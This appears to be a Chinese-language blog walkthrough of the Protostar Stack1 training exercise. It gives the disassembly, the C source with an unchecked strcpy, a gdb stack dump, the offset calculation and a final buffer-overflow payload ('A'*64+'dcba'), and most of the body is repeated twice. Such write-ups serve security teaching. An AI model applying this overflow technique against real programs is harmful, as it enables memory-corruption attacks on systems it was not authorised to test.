[exploit-exercises.com]Protostar Stack1 解答
assembler code:
0x08048464 <main+0>: push ebp
0x08048465 <main+1>: mov ebp,esp
0x08048467 <main+3>: and esp,0xfffffff0
0x0804846a <main+6>: sub esp,0x60
0x0804846d <main+9>: cmp DWORD PTR [ebp+0x8],0x1
0x08048471 <main+13>: jne 0x8048487 <main+35>
0x08048473 <main+15>: mov DWORD PTR [esp+0x4],0x80485a0
0x0804847b <main+23>: mov DWORD PTR [esp],0x1
0x08048482 <main+30>: call 0x8048388 <errx@plt>
0x08048487 <main+35>: mov DWORD PTR [esp+0x5c],0x0
0x0804848f <main+43>: mov eax,DWORD PTR [ebp+0xc]
0x08048492 <main+46>: add eax,0x4
0x08048495 <main+49>: mov eax,DWORD PTR [eax]
0x08048497 <main+51>: mov DWORD PTR [esp+0x4],eax
0x0804849b <main+55>: lea eax,[esp+0x1c]
0x0804849f <main+59>: mov DWORD PTR [esp],eax
0x080484a2 <main+62>: call 0x8048368 <strcpy@plt>
0x080484a7 <main+67>: mov eax,DWORD PTR [esp+0x5c]
0x080484ab <main+71>: cmp eax,0x61626364
0x080484b0 <main+76>: jne 0x80484c0 <main+92>
0x080484b2 <main+78>: mov DWORD PTR [esp],0x80485bc
0x080484b9 <main+85>: call 0x8048398 <puts@plt>
0x080484be <main+90>: jmp 0x80484d5 <main+113>
0x080484c0 <main+92>: mov edx,DWORD PTR [esp+0x5c]
0x080484c4 <main+96>: mov eax,0x80485f3
0x080484c9 <main+101>: mov DWORD PTR [esp+0x4],edx
0x080484cd <main+105>: mov DWORD PTR [esp],eax
0x080484d0 <main+108>: call 0x8048378 <printf@plt>
0x080484d5 <main+113>: leave
0x080484d6 <main+114>: ret
c code:
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argument\n"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right value\n"); } else { printf("Try again, you got 0x%08x\n", modified); } }
只要讓modified == 0x61626364就算通過 我們知道strcpy即使已經超過buffer大小還是會覆蓋過去
注意<main+67> & <main+71> 可以發現要覆蓋的地方是esp+0x5c
看一下esp
(gdb) break *0x080484a7
(gdb) x/24wx $esp
0xbffff750: 0xbffff76c 0xbffff997 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0x41414141
0xbffff770: 0x41414141 0x41414141 0xbfff0041 0x08048334
0xbffff780: 0xb7ff1040 0x080496fc 0xbffff7b8 0x08048509
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x080484f0 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x080484fb 0x00000000
(gdb) info register eax 0xbffff76c -1073744020 ecx 0x0 0 edx 0xe 14 ebx 0xb7fd7ff4 -1208123404 esp 0xbffff750 0xbffff750 ebp 0xbffff7b8 0xbffff7b8
所以要覆蓋的地址是esp+0x5c = 0xbffff7ac
0xbffff7ac-0xbffff76c=0x40=64 所以64個字元+0x61626364轉ascii='dcba'
0x08048464 <main+0>: push ebp
0x08048465 <main+1>: mov ebp,esp
0x08048467 <main+3>: and esp,0xfffffff0
0x0804846a <main+6>: sub esp,0x60
0x0804846d <main+9>: cmp DWORD PTR [ebp+0x8],0x1
0x08048471 <main+13>: jne 0x8048487 <main+35>
0x08048473 <main+15>: mov DWORD PTR [esp+0x4],0x80485a0
0x0804847b <main+23>: mov DWORD PTR [esp],0x1
0x08048482 <main+30>: call 0x8048388 <errx@plt>
0x08048487 <main+35>: mov DWORD PTR [esp+0x5c],0x0
0x0804848f <main+43>: mov eax,DWORD PTR [ebp+0xc]
0x08048492 <main+46>: add eax,0x4
0x08048495 <main+49>: mov eax,DWORD PTR [eax]
0x08048497 <main+51>: mov DWORD PTR [esp+0x4],eax
0x0804849b <main+55>: lea eax,[esp+0x1c]
0x0804849f <main+59>: mov DWORD PTR [esp],eax
0x080484a2 <main+62>: call 0x8048368 <strcpy@plt>
0x080484a7 <main+67>: mov eax,DWORD PTR [esp+0x5c]
0x080484ab <main+71>: cmp eax,0x61626364
0x080484b0 <main+76>: jne 0x80484c0 <main+92>
0x080484b2 <main+78>: mov DWORD PTR [esp],0x80485bc
0x080484b9 <main+85>: call 0x8048398 <puts@plt>
0x080484be <main+90>: jmp 0x80484d5 <main+113>
0x080484c0 <main+92>: mov edx,DWORD PTR [esp+0x5c]
0x080484c4 <main+96>: mov eax,0x80485f3
0x080484c9 <main+101>: mov DWORD PTR [esp+0x4],edx
0x080484cd <main+105>: mov DWORD PTR [esp],eax
0x080484d0 <main+108>: call 0x8048378 <printf@plt>
0x080484d5 <main+113>: leave
0x080484d6 <main+114>: ret
c code:
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argument\n"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right value\n"); } else { printf("Try again, you got 0x%08x\n", modified); } }
只要讓modified == 0x61626364就算通過 我們知道strcpy即使已經超過buffer大小還是會覆蓋過去
注意<main+67> & <main+71> 可以發現要覆蓋的地方是esp+0x5c
看一下esp
(gdb) break *0x080484a7
(gdb) x/24wx $esp
0xbffff750: 0xbffff76c 0xbffff997 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0x41414141
0xbffff770: 0x41414141 0x41414141 0xbfff0041 0x08048334
0xbffff780: 0xb7ff1040 0x080496fc 0xbffff7b8 0x08048509
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x080484f0 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x080484fb 0x00000000
(gdb) info register eax 0xbffff76c -1073744020 ecx 0x0 0 edx 0xe 14 ebx 0xb7fd7ff4 -1208123404 esp 0xbffff750 0xbffff750 ebp 0xbffff7b8 0xbffff7b8
所以要覆蓋的地址是esp+0x5c = 0xbffff7ac
0xbffff7ac-0xbffff76c=0x40=64 所以64個字元+0x61626364轉ascii='dcba'
payload = 'A'*64+'dcba'
留言
張貼留言